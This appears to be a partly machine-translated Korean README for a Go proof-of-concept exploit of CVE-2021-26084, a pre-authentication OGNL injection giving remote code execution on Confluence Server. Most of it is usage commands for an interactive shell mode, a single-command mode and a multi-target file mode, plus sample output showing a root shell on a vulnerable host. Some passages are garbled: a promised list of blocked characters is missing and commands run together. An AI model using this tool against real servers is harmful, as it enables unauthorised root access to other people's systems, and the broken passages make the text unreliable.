
CVE-2021-26084 - Confluence Server Webwork OGNL 인젝션 (인증 전 RCE)
CVE-2021-26084에 대한 개념 증명
Confluence Server Webwork OGNL 주입 (Pre-Auth RCE)
이는 교육 목적으로만 제공됩니다. 저는 귀하의 행동에 대해 책임을 지지 않습니다. 사용에 따른 책임은 본인에게 있습니다.
페이로드로 인해 일부 문자를 전달할 수 없습니다. 아래 목록은 제 테스트 중 발견한 것입니다.
"| go run exploit.go -t <target> -i
예제
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
exit 입력go run exploit.go -t <target> -c <command>
go run exploit.go -f <file> -c <command>
go mod download
go build exploit.go